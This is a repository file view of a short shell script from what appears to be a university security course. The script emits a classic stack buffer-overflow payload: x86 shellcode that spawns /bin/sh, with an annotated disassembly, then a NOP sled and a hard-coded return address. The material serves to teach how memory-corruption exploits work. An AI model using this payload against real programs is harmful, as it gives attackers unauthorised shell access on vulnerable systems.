Mercurial Mercurial > hg > sen-material / file revision
summary | shortlog | changelog | graph | tags | bookmarks | branches | files | changeset | file | latest | revisions | annotate | diff | comparison | raw | help
Find changesets by keywords (author, files, the commit message), revision number or hash, or revset expression.
Attic/programs/args3
author Christian Urban <christian dot urban at kcl dot ac dot uk>
Sat, 04 Oct 2014 13:17:18 +0100
changeset 198 2ce98ee39990
parent 115 programs/args3@c4008b31df8e
permissions -rwxr-xr-x
reorganised

#!/bin/sh

# shellscript that overwrites the buffer with 
# some payload for opening a shell (the payload
# cannot contain any \x00)


shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 

# 24 bytes of shellcode

# "\x31\xc0"                      // xorl         %eax,%eax
# "\x50"                          // pushl        %eax
# "\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
# "\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
# "\x89\xe3"                      // movl         %esp,%ebx
# "\x99"                          // cltd
# "\x52"                          // pushl        %edx
# "\x53"                          // pushl        %ebx
# "\x89\xe1"                      // movl         %esp,%ecx
# "\xb0\x0b"                      // movb         $0xb,%al
# "\xcd\x80"                      // int          $0x80

padding=`perl -e 'print "\x90" x 80'`

# need s correct address in order to run
printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
sen-material